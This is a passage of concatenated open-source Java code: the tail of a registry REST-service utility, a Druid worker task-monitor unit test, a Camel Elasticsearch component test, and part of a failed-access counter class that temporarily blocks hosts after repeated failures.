uriTemplates = new ArrayList<>(); Iterator resources = resourcesElement.getChildrenWithLocalName(RESOURCE); while(resources.hasNext()) { OMElement resource = (OMElement) resources.next(); String path = resource.getAttributeValue(new QName(PATH)); path = path.endsWith(PATH_SEPERATOR) ? path : path + PATH_SEPERATOR; Iterator methods = resource.getChildrenWithLocalName(METHOD); uriTemplates.addAll(getUriTemplateElementFromMethods(path, methods)); Iterator subResources = resource.getChildrenWithLocalName(RESOURCE); while (subResources.hasNext()) { OMElement subResource = (OMElement) subResources.next(); String subPath = subResource.getAttributeValue(new QName(PATH)); subPath = subPath.startsWith(PATH_SEPERATOR) ? subPath.substring(1) : subPath; Iterator subMethods = resource.getChildrenWithLocalName(METHOD); uriTemplates.addAll(getUriTemplateElementFromMethods(subPath, subMethods)); } } return uriTemplates; } /** * Creates uri template elements for HTTP action verbs. * * @param resourcePath resource path. * @param methods http verbs. * @return Uri template element list. */ private static List<OMElement> getUriTemplateElementFromMethods(String resourcePath, Iterator methods) { List<OMElement> uriTemplates = new ArrayList<>(); while(methods.hasNext()) { OMElement method = (OMElement) methods.next(); String httpVerb = method.getAttributeValue(new QName(NAME)); OMElement uriTemplateElement = factory.createOMElement(URI_TEMPLATE, namespace); OMElement urlPatternElement = factory.createOMElement(URL_PATTERN, namespace); OMElement httpVerbElement = factory.createOMElement(HTTP_VERB, namespace); OMElement authTypeElement = factory.createOMElement(AUTH_TYPE, namespace); urlPatternElement.setText(resourcePath); httpVerbElement.setText(httpVerb); uriTemplateElement.addChild(urlPatternElement); uriTemplateElement.addChild(httpVerbElement); uriTemplateElement.addChild(authTypeElement); uriTemplates.add(uriTemplateElement); } return uriTemplates; } /** * Returns the root location of the API. * * @param registryContext registry context * @return The root location of the API artifact. */ private static String getChrootedServiceLocation(RegistryContext registryContext) { return RegistryUtils.getAbsolutePath(registryContext, RegistryConstants.GOVERNANCE_REGISTRY_BASE_PATH + commonRestServiceLocation); } /** * Returns the root location of the endpoint. * * @param registryContext registry context * @return The root location of the Endpoint artifact. */ private static String getChrootedEndpointLocation(RegistryContext registryContext) { return RegistryUtils.getAbsolutePath(registryContext, RegistryConstants.GOVERNANCE_REGISTRY_BASE_PATH + commonEndpointLocation); } /** * Set the restServiceLocation. * * @param restServiceLocation the restServiceLocation */ public static void setCommonRestServiceLocation(String restServiceLocation) { RESTServiceUtils.commonRestServiceLocation = restServiceLocation; } /** * Set the endpointLocation. * * @param endpointLocation the endpointLocation */ public static void setCommonEndpointLocation(String endpointLocation) { RESTServiceUtils.commonEndpointLocation = endpointLocation; } /** * This method used to extract properties from request context * @param requestContext Request Context * @return Extracted Properties */ private static Properties copyProperties(RequestContext requestContext) { Properties properties = requestContext.getResource().getProperties(); Properties copiedProperties = new Properties(); if (properties != null) { List<String> linkProperties = Arrays.asList( RegistryConstants.REGISTRY_LINK, RegistryConstants.REGISTRY_USER, RegistryConstants.REGISTRY_MOUNT, RegistryConstants.REGISTRY_AUTHOR, RegistryConstants.REGISTRY_MOUNT_POINT, RegistryConstants.REGISTRY_TARGET_POINT, RegistryConstants.REGISTRY_ACTUAL_PATH, RegistryConstants.REGISTRY_REAL_PATH); for (Map.Entry<Object, Object> e : properties.entrySet()) { String key = (String) e.getKey(); if (!linkProperties.contains(key) && !(key.startsWith("resource") || key.startsWith("registry"))) { copiedProperties.put(key, (List<String>) e.getValue()); } } } return copiedProperties; } }
/* * Licensed to Metamarkets Group Inc. (Metamarkets) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. Metamarkets licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package io.druid.indexing.worker; import com.fasterxml.jackson.databind.ObjectMapper; import com.fasterxml.jackson.databind.jsontype.NamedType; import com.google.common.base.Joiner; import com.google.common.collect.Lists; import com.google.common.io.Files; import io.druid.curator.PotentiallyGzippedCompressionProvider; import io.druid.indexing.common.IndexingServiceCondition; import io.druid.indexing.common.SegmentLoaderFactory; import io.druid.indexing.common.TaskStatus; import io.druid.indexing.common.TaskToolboxFactory; import io.druid.indexing.common.TestMergeTask; import io.druid.indexing.common.TestRealtimeTask; import io.druid.indexing.common.TestUtils; import io.druid.indexing.common.actions.TaskActionClient; import io.druid.indexing.common.actions.TaskActionClientFactory; import io.druid.indexing.common.config.TaskConfig; import io.druid.indexing.common.task.Task; import io.druid.indexing.overlord.TestRemoteTaskRunnerConfig; import io.druid.indexing.overlord.ThreadPoolTaskRunner; import io.druid.indexing.worker.config.WorkerConfig; import io.druid.segment.IndexIO; import io.druid.segment.IndexMerger; import io.druid.segment.loading.SegmentLoaderConfig; import io.druid.segment.loading.SegmentLoaderLocalCacheManager; import io.druid.segment.loading.StorageLocationConfig; import io.druid.segment.realtime.plumber.SegmentHandoffNotifierFactory; import io.druid.server.initialization.IndexerZkConfig; import io.druid.server.initialization.ZkPathsConfig; import io.druid.server.metrics.NoopServiceEmitter; import org.apache.curator.framework.CuratorFramework; import org.apache.curator.framework.CuratorFrameworkFactory; import org.apache.curator.retry.ExponentialBackoffRetry; import org.apache.curator.test.TestingCluster; import org.easymock.EasyMock; import org.joda.time.Period; import org.junit.After; import org.junit.Assert; import org.junit.Before; import org.junit.Test; import java.util.List; /** */ public class WorkerTaskMonitorTest { private static final Joiner joiner = Joiner.on("/"); private static final String basePath = "/test/druid"; private static final String tasksPath = String.format("%s/indexer/tasks/worker", basePath); private static final String statusPath = String.format("%s/indexer/status/worker", basePath); private TestingCluster testingCluster; private CuratorFramework cf; private WorkerCuratorCoordinator workerCuratorCoordinator; private WorkerTaskMonitor workerTaskMonitor; private TestMergeTask task; private Worker worker; private ObjectMapper jsonMapper; private IndexMerger indexMerger; private IndexIO indexIO; public WorkerTaskMonitorTest() { TestUtils testUtils = new TestUtils(); jsonMapper = testUtils.getTestObjectMapper(); indexMerger = testUtils.getTestIndexMerger(); indexIO = testUtils.getTestIndexIO(); } @Before public void setUp() throws Exception { testingCluster = new TestingCluster(1); testingCluster.start(); cf = CuratorFrameworkFactory.builder() .connectString(testingCluster.getConnectString()) .retryPolicy(new ExponentialBackoffRetry(1, 10)) .compressionProvider(new PotentiallyGzippedCompressionProvider(false)) .build(); cf.start(); cf.create().creatingParentsIfNeeded().forPath(basePath); worker = new Worker( "worker", "localhost", 3, "0" ); workerCuratorCoordinator = new WorkerCuratorCoordinator( jsonMapper, new IndexerZkConfig( new ZkPathsConfig() { @Override public String getBase() { return basePath; } }, null, null, null, null, null ), new TestRemoteTaskRunnerConfig(new Period("PT1S")), cf, worker ); workerCuratorCoordinator.start(); // Start a task monitor workerTaskMonitor = createTaskMonitor(); jsonMapper.registerSubtypes(new NamedType(TestMergeTask.class, "test")); jsonMapper.registerSubtypes(new NamedType(TestRealtimeTask.class, "test_realtime")); workerTaskMonitor.start(); task = TestMergeTask.createDummyTask("test"); } private WorkerTaskMonitor createTaskMonitor() { final TaskConfig taskConfig = new TaskConfig(Files.createTempDir().toString(), null, null, 0, null, null, null); TaskActionClientFactory taskActionClientFactory = EasyMock.createNiceMock(TaskActionClientFactory.class); TaskActionClient taskActionClient = EasyMock.createNiceMock(TaskActionClient.class); EasyMock.expect(taskActionClientFactory.create(EasyMock.<Task>anyObject())).andReturn(taskActionClient).anyTimes(); SegmentHandoffNotifierFactory notifierFactory = EasyMock.createNiceMock(SegmentHandoffNotifierFactory.class); EasyMock.replay(taskActionClientFactory, taskActionClient, notifierFactory); return new WorkerTaskMonitor( jsonMapper, cf, workerCuratorCoordinator, new ThreadPoolTaskRunner( new TaskToolboxFactory( taskConfig, taskActionClientFactory, null, null, null, null, null, null, notifierFactory, null, null, null, new SegmentLoaderFactory( new SegmentLoaderLocalCacheManager( null, new SegmentLoaderConfig() { @Override public List<StorageLocationConfig> getLocations() { return Lists.newArrayList(); } } , jsonMapper ) ), jsonMapper, indexMerger, indexIO, null, null ), taskConfig, new NoopServiceEmitter() ), new WorkerConfig().setCapacity(1) ); } @After public void tearDown() throws Exception { workerTaskMonitor.stop(); cf.close(); testingCluster.stop(); } @Test public void testRunTask() throws Exception { cf.create() .creatingParentsIfNeeded() .forPath(joiner.join(tasksPath, task.getId()), jsonMapper.writeValueAsBytes(task)); Assert.assertTrue( TestUtils.conditionValid( new IndexingServiceCondition() { @Override public boolean isValid() { try { return cf.checkExists().forPath(joiner.join(tasksPath, task.getId())) == null; } catch (Exception e) { return false; } } } ) ); Assert.assertTrue( TestUtils.conditionValid( new IndexingServiceCondition() { @Override public boolean isValid() { try { return cf.checkExists().forPath(joiner.join(statusPath, task.getId())) != null; } catch (Exception e) { return false; } } } ) ); TaskAnnouncement taskAnnouncement = jsonMapper.readValue( cf.getData().forPath(joiner.join(statusPath, task.getId())), TaskAnnouncement.class ); Assert.assertEquals(task.getId(), taskAnnouncement.getTaskStatus().getId()); Assert.assertEquals(TaskStatus.Status.RUNNING, taskAnnouncement.getTaskStatus().getStatusCode()); } @Test public void testGetAnnouncements() throws Exception { cf.create() .creatingParentsIfNeeded() .forPath(joiner.join(tasksPath, task.getId()), jsonMapper.writeValueAsBytes(task)); Assert.assertTrue( TestUtils.conditionValid( new IndexingServiceCondition() { @Override public boolean isValid() { try { return cf.checkExists().forPath(joiner.join(statusPath, task.getId())) != null; } catch (Exception e) { return false; } } } ) ); List<TaskAnnouncement> announcements = workerCuratorCoordinator.getAnnouncements(); Assert.assertEquals(1, announcements.size()); Assert.assertEquals(task.getId(), announcements.get(0).getTaskStatus().getId()); Assert.assertEquals(TaskStatus.Status.RUNNING, announcements.get(0).getTaskStatus().getStatusCode()); } @Test public void testRestartCleansOldStatus() throws Exception { cf.create() .creatingParentsIfNeeded() .forPath(joiner.join(tasksPath, task.getId()), jsonMapper.writeValueAsBytes(task)); Assert.assertTrue( TestUtils.conditionValid( new IndexingServiceCondition() { @Override public boolean isValid() { try { return cf.checkExists().forPath(joiner.join(statusPath, task.getId())) != null; } catch (Exception e) { return false; } } } ) ); // simulate node restart workerTaskMonitor.stop(); workerTaskMonitor = createTaskMonitor(); workerTaskMonitor.start(); List<TaskAnnouncement> announcements = workerCuratorCoordinator.getAnnouncements(); Assert.assertEquals(1, announcements.size()); Assert.assertEquals(task.getId(), announcements.get(0).getTaskStatus().getId()); Assert.assertEquals(TaskStatus.Status.FAILED, announcements.get(0).getTaskStatus().getStatusCode()); } @Test public void testStatusAnnouncementsArePersistent() throws Exception { cf.create() .creatingParentsIfNeeded() .forPath(joiner.join(tasksPath, task.getId()), jsonMapper.writeValueAsBytes(task)); Assert.assertTrue( TestUtils.conditionValid( new IndexingServiceCondition() { @Override public boolean isValid() { try { return cf.checkExists().forPath(joiner.join(statusPath, task.getId())) != null; } catch (Exception e) { return false; } } } ) ); // ephermal owner is 0 is created node is PERSISTENT Assert.assertEquals(0, cf.checkExists().forPath(joiner.join(statusPath, task.getId())).getEphemeralOwner()); } }
/** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.camel.component.elasticsearch; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; import org.apache.camel.builder.RouteBuilder; import org.elasticsearch.action.delete.DeleteRequest; import org.elasticsearch.action.delete.DeleteResponse; import org.elasticsearch.action.get.GetRequest; import org.elasticsearch.action.get.GetResponse; import org.elasticsearch.action.get.MultiGetItemResponse; import org.elasticsearch.action.get.MultiGetRequest.Item; import org.elasticsearch.action.get.MultiGetResponse; import org.elasticsearch.action.index.IndexRequest; import org.elasticsearch.action.search.MultiSearchResponse; import org.elasticsearch.action.search.SearchRequest; import org.elasticsearch.action.search.SearchRequestBuilder; import org.elasticsearch.action.search.SearchResponse; import org.elasticsearch.index.query.QueryBuilders; import org.junit.Test; import static org.hamcrest.CoreMatchers.equalTo; import static org.hamcrest.CoreMatchers.notNullValue; public class ElasticsearchGetSearchDeleteExistsUpdateTest extends ElasticsearchBaseTest { @Test public void testGet() throws Exception { //first, INDEX a value Map<String, String> map = createIndexedData(); sendBody("direct:index", map); String indexId = template.requestBody("direct:index", map, String.class); assertNotNull("indexId should be set", indexId); //now, verify GET succeeded GetResponse response = template.requestBody("direct:get", indexId, GetResponse.class); assertNotNull("response should not be null", response); assertNotNull("response source should not be null", response.getSource()); } @Test public void testDelete() throws Exception { //first, INDEX a value Map<String, String> map = createIndexedData(); sendBody("direct:index", map); String indexId = template.requestBody("direct:index", map, String.class); assertNotNull("indexId should be set", indexId); //now, verify GET succeeded GetResponse response = template.requestBody("direct:get", indexId, GetResponse.class); assertNotNull("response should not be null", response); assertNotNull("response source should not be null", response.getSource()); //now, perform DELETE DeleteResponse deleteResponse = template.requestBody("direct:delete", indexId, DeleteResponse.class); assertNotNull("response should not be null", deleteResponse); //now, verify GET fails to find the indexed value response = template.requestBody("direct:get", indexId, GetResponse.class); assertNotNull("response should not be null", response); assertNull("response source should be null", response.getSource()); } @Test public void testSearch() throws Exception { //first, INDEX a value Map<String, String> map = createIndexedData(); sendBody("direct:index", map); //now, verify GET succeeded Map<String, Object> actualQuery = new HashMap<String, Object>(); actualQuery.put("content", "searchtest"); Map<String, Object> match = new HashMap<String, Object>(); match.put("match", actualQuery); Map<String, Object> query = new HashMap<String, Object>(); query.put("query", match); SearchResponse response = template.requestBody("direct:search", query, SearchResponse.class); assertNotNull("response should not be null", response); assertNotNull("response hits should be == 1", response.getHits().totalHits()); } @Test public void testUpdate() throws Exception { Map<String, String> map = createIndexedData(); String indexId = template.requestBody("direct:index", map, String.class); assertNotNull("indexId should be set", indexId); Map<String, String> newMap = new HashMap<>(); newMap.put(createPrefix() + "key2", createPrefix() + "value2"); Map<String, Object> headers = new HashMap<>(); headers.put(ElasticsearchConstants.PARAM_INDEX_ID, indexId); indexId = template.requestBodyAndHeaders("direct:update", newMap, headers, String.class); assertNotNull("indexId should be set", indexId); } @Test public void testGetWithHeaders() throws Exception { //first, INDEX a value Map<String, String> map = createIndexedData(); Map<String, Object> headers = new HashMap<String, Object>(); headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_INDEX); headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "twitter"); headers.put(ElasticsearchConstants.PARAM_INDEX_TYPE, "tweet"); String indexId = template.requestBodyAndHeaders("direct:start", map, headers, String.class); //now, verify GET headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_GET_BY_ID); GetResponse response = template.requestBodyAndHeaders("direct:start", indexId, headers, GetResponse.class); assertNotNull("response should not be null", response); assertNotNull("response source should not be null", response.getSource()); } @Test public void testExistsWithHeaders() throws Exception { //first, INDEX a value Map<String, String> map = createIndexedData(); Map<String, Object> headers = new HashMap<String, Object>(); headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_INDEX); headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "twitter"); headers.put(ElasticsearchConstants.PARAM_INDEX_TYPE, "tweet"); String indexId = template.requestBodyAndHeaders("direct:start", map, headers, String.class); //now, verify GET headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_EXISTS); headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "twitter"); Boolean exists = template.requestBodyAndHeaders("direct:exists", "", headers, Boolean.class); assertNotNull("response should not be null", exists); assertTrue("Index should exists", exists); } @Test public void testMultiGet() throws Exception { //first, INDEX two values Map<String, String> map = createIndexedData(); Map<String, Object> headers = new HashMap<String, Object>(); headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_INDEX); headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "twitter"); headers.put(ElasticsearchConstants.PARAM_INDEX_TYPE, "tweet"); headers.put(ElasticsearchConstants.PARAM_INDEX_ID, "1"); template.requestBodyAndHeaders("direct:start", map, headers, String.class); headers.clear(); headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_INDEX); headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "facebook"); headers.put(ElasticsearchConstants.PARAM_INDEX_TYPE, "status"); headers.put(ElasticsearchConstants.PARAM_INDEX_ID, "2"); template.requestBodyAndHeaders("direct:start", map, headers, String.class); headers.clear(); //now, verify MULTIGET headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_MULTIGET); Item item1 = new Item("twitter", "tweet", "1"); Item item2 = new Item("facebook", "status", "2"); Item item3 = new Item("instagram", "latest", "3"); List<Item> list = new ArrayList<Item>(); list.add(item1); list.add(item2); list.add(item3); MultiGetResponse response = template.requestBodyAndHeaders("direct:start", list, headers, MultiGetResponse.class); MultiGetItemResponse[] responses = response.getResponses(); assertNotNull("response should not be null", response); assertEquals("response should contains three multiGetResponse object", 3, response.getResponses().length); assertEquals("response 1 should contains tweet as type", "tweet", responses[0].getResponse().getType().toString()); assertEquals("response 2 should contains status as type", "status", responses[1].getResponse().getType().toString()); assertFalse("response 1 should be ok", responses[0].isFailed()); assertFalse("response 2 should be ok", responses[1].isFailed()); assertTrue("response 3 should be failed", responses[2].isFailed()); } @Test public void testMultiSearch() throws Exception { //first, INDEX two values Map<String, Object> headers = new HashMap<String, Object>(); node.client().prepareIndex("test", "type", "1").setSource("field", "xxx").execute().actionGet(); node.client().prepareIndex("test", "type", "2").setSource("field", "yyy").execute().actionGet(); //now, verify MULTISEARCH headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_MULTISEARCH); SearchRequestBuilder srb1 = node.client().prepareSearch("test").setTypes("type").setQuery(QueryBuilders.termQuery("field", "xxx")); SearchRequestBuilder srb2 = node.client().prepareSearch("test").setTypes("type").setQuery(QueryBuilders.termQuery("field", "yyy")); SearchRequestBuilder srb3 = node.client().prepareSearch("instagram") .setTypes("type").setQuery(QueryBuilders.termQuery("test-multisearchkey", "test-multisearchvalue")); List<SearchRequest> list = new ArrayList<>(); list.add(srb1.request()); list.add(srb2.request()); list.add(srb3.request()); MultiSearchResponse response = template.requestBodyAndHeaders("direct:multisearch", list, headers, MultiSearchResponse.class); MultiSearchResponse.Item[] responses = response.getResponses(); assertNotNull("response should not be null", response); assertEquals("response should contains three multiSearchResponse object", 3, response.getResponses().length); assertFalse("response 1 should be ok", responses[0].isFailure()); assertFalse("response 2 should be ok", responses[1].isFailure()); assertTrue("response 3 should be failed", responses[2].isFailure()); } @Test public void testDeleteWithHeaders() throws Exception { //first, INDEX a value Map<String, String> map = createIndexedData(); Map<String, Object> headers = new HashMap<String, Object>(); headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_INDEX); headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "twitter"); headers.put(ElasticsearchConstants.PARAM_INDEX_TYPE, "tweet"); String indexId = template.requestBodyAndHeaders("direct:start", map, headers, String.class); //now, verify GET headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_GET_BY_ID); GetResponse response = template.requestBodyAndHeaders("direct:start", indexId, headers, GetResponse.class); assertNotNull("response should not be null", response); assertNotNull("response source should not be null", response.getSource()); //now, perform DELETE headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_DELETE); DeleteResponse deleteResponse = template.requestBodyAndHeaders("direct:start", indexId, headers, DeleteResponse.class); assertNotNull("response should not be null", deleteResponse); //now, verify GET fails to find the indexed value headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_GET_BY_ID); response = template.requestBodyAndHeaders("direct:start", indexId, headers, GetResponse.class); assertNotNull("response should not be null", response); assertNull("response source should be null", response.getSource()); } @Test public void testUpdateWithIDInHeader() throws Exception { Map<String, String> map = createIndexedData(); Map<String, Object> headers = new HashMap<String, Object>(); headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_INDEX); headers.put(ElasticsearchConstants.PARAM_INDEX_NAME, "twitter"); headers.put(ElasticsearchConstants.PARAM_INDEX_TYPE, "tweet"); headers.put(ElasticsearchConstants.PARAM_INDEX_ID, "123"); String indexId = template.requestBodyAndHeaders("direct:start", map, headers, String.class); assertNotNull("indexId should be set", indexId); assertEquals("indexId should be equals to the provided id", "123", indexId); headers.put(ElasticsearchConstants.PARAM_OPERATION, ElasticsearchConstants.OPERATION_UPDATE); indexId = template.requestBodyAndHeaders("direct:start", map, headers, String.class); assertNotNull("indexId should be set", indexId); assertEquals("indexId should be equals to the provided id", "123", indexId); } @Test public void getRequestBody() throws Exception { String prefix = createPrefix(); // given GetRequest request = new GetRequest(prefix + "foo").type(prefix + "bar"); // when String documentId = template.requestBody("direct:index", new IndexRequest(prefix + "foo", prefix + "bar", prefix + "testId") .source("{\"" + prefix + "content\": \"" + prefix + "hello\"}"), String.class); GetResponse response = template.requestBody("direct:get", request.id(documentId), GetResponse.class); // then assertThat(response, notNullValue()); assertThat(prefix + "hello", equalTo(response.getSourceAsMap().get(prefix + "content"))); } @Test public void deleteRequestBody() throws Exception { String prefix = createPrefix(); // given DeleteRequest request = new DeleteRequest(prefix + "foo").type(prefix + "bar"); // when String documentId = template.requestBody("direct:index", new IndexRequest("" + prefix + "foo", "" + prefix + "bar", "" + prefix + "testId") .source("{\"" + prefix + "content\": \"" + prefix + "hello\"}"), String.class); DeleteResponse response = template.requestBody("direct:delete", request.id(documentId), DeleteResponse.class); // then assertThat(response, notNullValue()); assertThat(documentId, equalTo(response.getId())); } @Override protected RouteBuilder createRouteBuilder() throws Exception { return new RouteBuilder() { @Override public void configure() { from("direct:start").to("elasticsearch://local?operation=INDEX"); from("direct:index").to("elasticsearch://local?operation=INDEX&indexName=twitter&indexType=tweet"); from("direct:get").to("elasticsearch://local?operation=GET_BY_ID&indexName=twitter&indexType=tweet"); from("direct:multiget").to("elasticsearch://local?operation=MULTIGET&indexName=twitter&indexType=tweet"); from("direct:delete").to("elasticsearch://local?operation=DELETE&indexName=twitter&indexType=tweet"); from("direct:search").to("elasticsearch://local?operation=SEARCH&indexName=twitter&indexType=tweet"); from("direct:update").to("elasticsearch://local?operation=UPDATE&indexName=twitter&indexType=tweet"); from("direct:exists").to("elasticsearch://local?operation=EXISTS"); from("direct:multisearch").to("elasticsearch://local?operation=MULTISEARCH&indexName=test"); } }; } }
/* * Copyright 2015 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.bremersee.fac; import org.apache.commons.lang3.Validate; import org.bremersee.comparator.ObjectComparatorFactory; import org.bremersee.fac.domain.FailedAccessDao; import org.bremersee.fac.domain.mem.FailedAccessInMemoryDao; import org.bremersee.fac.model.AccessResultDto; import org.bremersee.fac.model.BooleanDto; import org.bremersee.fac.model.FailedAccess; import org.bremersee.fac.model.FailedAccessDto; import org.bremersee.pagebuilder.PageBuilder; import org.bremersee.pagebuilder.PageBuilderImpl; import org.bremersee.pagebuilder.PageBuilderUtils; import org.bremersee.pagebuilder.PageEntryTransformer; import org.bremersee.pagebuilder.model.Page; import org.bremersee.pagebuilder.model.PageDto; import org.bremersee.pagebuilder.model.PageRequest; import org.bremersee.pagebuilder.model.PageRequestDto; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import javax.annotation.PostConstruct; import javax.annotation.PreDestroy; import java.io.Serializable; import java.time.Duration; import java.util.Date; import java.util.Iterator; import java.util.List; /** * <p> * Default failed access counter implementation. It can use any store that * implements {@link FailedAccessDao}. It uses an internal thread for removing * obsolete failed access entries. So it is important that the failed access * counter is started and stopped properly (see * {@link FailedAccessCounterImpl#start()} and * {@link FailedAccessCounterImpl#stop()}). * </p> * * @author Christian Bremer */ @SuppressWarnings("SameParameterValue") public class FailedAccessCounterImpl implements FailedAccessCounter { /** * The logger */ private final Logger log = LoggerFactory.getLogger(getClass()); private final Object lock = new Object(); private boolean started; /** * The failed access DAO */ private FailedAccessDao failedAccessDao; /** * The page builder */ private PageBuilder pageBuilder; private int failedAccessCounterThreshold; private long removeFailedAccessEntriesAfterMillis; private long removeFailedEntriesInterval; private volatile long lastRemovingOfFailedEntries; private volatile long lastRemovingOfFailedEntriesDuration; private volatile int lastRemovingOfFailedEntriesSize; private volatile long removedFailedEntriesTotalSize; private volatile boolean removingRunnning; /** * The thread for removing obsolete failed access entries. */ private final Thread removeFailedEntriesThread = new Thread() { @Override public void run() { while (!isInterrupted()) { FailedAccessCounterImpl.this.removeObsoleteFailedAccessEntries(); try { Thread.sleep(FailedAccessCounterImpl.this.getRemoveFailedEntriesInterval()); } catch (InterruptedException e) { this.interrupt(); return; } } } }; /** * Default constructor. */ public FailedAccessCounterImpl() { pageBuilder = new PageBuilderImpl(); failedAccessCounterThreshold = 10; removeFailedAccessEntriesAfterMillis = Duration.ofHours(23L).toMillis(); removeFailedEntriesInterval = Duration.ofHours(1L).toMillis(); lastRemovingOfFailedEntries = System.currentTimeMillis(); lastRemovingOfFailedEntriesDuration = 0L; lastRemovingOfFailedEntriesSize = 0; removedFailedEntriesTotalSize = 0L; removingRunnning = false; } /** * Starts the failed access counter. */ @PostConstruct public void start() { synchronized (lock) { if (!started) { log.info("Starting " + getClass().getSimpleName() + " ..."); if (failedAccessDao == null) { FailedAccessInMemoryDao failedAccessDao = new FailedAccessInMemoryDao(); // NOSONAR failedAccessDao.setObjectComparatorFactory(ObjectComparatorFactory.newInstance()); failedAccessDao.init(); this.failedAccessDao = failedAccessDao; } log.info("failedAccessDao = " + failedAccessDao.getClass().getSimpleName()); // NOSONAR log.info("failedAccessCounterThreshold = " + getFailedAccessCounterThreshold()); log.info("removeFailedAccessEntriesAfterMillis = " + getRemoveFailedAccessEntriesAfterMillis()); log.info("removeFailedEntriesInterval = " + getRemoveFailedEntriesInterval()); lastRemovingOfFailedEntries = System.currentTimeMillis(); removeFailedEntriesThread.start(); log.info(getClass().getSimpleName() + " successfully started."); started = true; } else { log.warn("Failed access counter is already started."); } } } /** * Stops the failed access counter. */ @PreDestroy public void stop() { synchronized (lock) { if (started) { log.info("Stopping " + getClass().getSimpleName() + " ..."); removeFailedEntriesThread.interrupt(); log.info(getClass().getSimpleName() + " successfully stopped."); started = false; } else { log.warn("Failed access counter has not been started."); } } } /** * Sets the failed access DAO. * * @param failedAccessDao the failed access DAO */ public void setFailedAccessDao(final FailedAccessDao failedAccessDao) { this.failedAccessDao = failedAccessDao; } /** * Sets the page builder. * * @param pageBuilder the page builder */ public void setPageBuilder(final PageBuilder pageBuilder) { if (pageBuilder != null) { this.pageBuilder = pageBuilder; } } @Override public int getFailedAccessCounterThreshold() { return failedAccessCounterThreshold; } /** * Sets the counter threshold. * * @param failedAccessCounterThreshold the counter threshold */ public void setFailedAccessCounterThreshold(final int failedAccessCounterThreshold) { this.failedAccessCounterThreshold = failedAccessCounterThreshold; } @Override public long getRemoveFailedAccessEntriesAfterMillis() { return removeFailedAccessEntriesAfterMillis; } /** * Sets the lifetime of a failed access entry. * * @param removeFailedAccessEntriesAfterMillis the lifetime of a failed access entry */ public void setRemoveFailedAccessEntriesAfterMillis(final long removeFailedAccessEntriesAfterMillis) { this.removeFailedAccessEntriesAfterMillis = removeFailedAccessEntriesAfterMillis; } @Override public long getRemoveFailedEntriesInterval() { return removeFailedEntriesInterval; } /** * Sets the interval of removing obsolete failed access entries. * * @param removeFailedEntriesInterval the interval of removing obsolete failed access entries */ public void setRemoveFailedEntriesInterval(final long removeFailedEntriesInterval) { this.removeFailedEntriesInterval = removeFailedEntriesInterval; } /** * Returns {@code true} if the access to the resource is not blocked for the * remote host, otherwise {@code false}. * * @param failedAccess the failed access entry * @return {@code true} if the access to the resource is not blocked for the * remote host, otherwise {@code false} */ private boolean isAccessGranted(FailedAccess failedAccess) { return failedAccess == null || failedAccess.getCounter() <= this.failedAccessCounterThreshold; } /** * Calculates how log the resource is blocked for the remote host. * * @param failedAccess the failed access entry * @return the date until the resource is blocked for the remote host or * {@code null}, if the resource is not blocked */ private Date calculateAccessDeniedUntil(final FailedAccess failedAccess) { if (isAccessGranted(failedAccess) || failedAccess.getModificationDate() == null) { return null; } long accessDeniedUntilMillis = failedAccess.getModificationDate().getTime() + removeFailedAccessEntriesAfterMillis; long nextRemove = lastRemovingOfFailedEntries + removeFailedEntriesInterval; while (nextRemove < accessDeniedUntilMillis) { nextRemove = nextRemove + removeFailedEntriesInterval; } long plus = nextRemove - accessDeniedUntilMillis; accessDeniedUntilMillis = accessDeniedUntilMillis + plus; return new Date(accessDeniedUntilMillis); } @Override public Date getLastRemovingOfFailedEntries() { return new Date(lastRemovingOfFailedEntries); } @Override public long getLastRemovingOfFailedEntriesDuration() { return lastRemovingOfFailedEntriesDuration; } @Override public int getLastRemovingOfFailedEntriesSize() { return lastRemovingOfFailedEntriesSize; } @Override public long getRemovedFailedEntriesTotalSize() { return 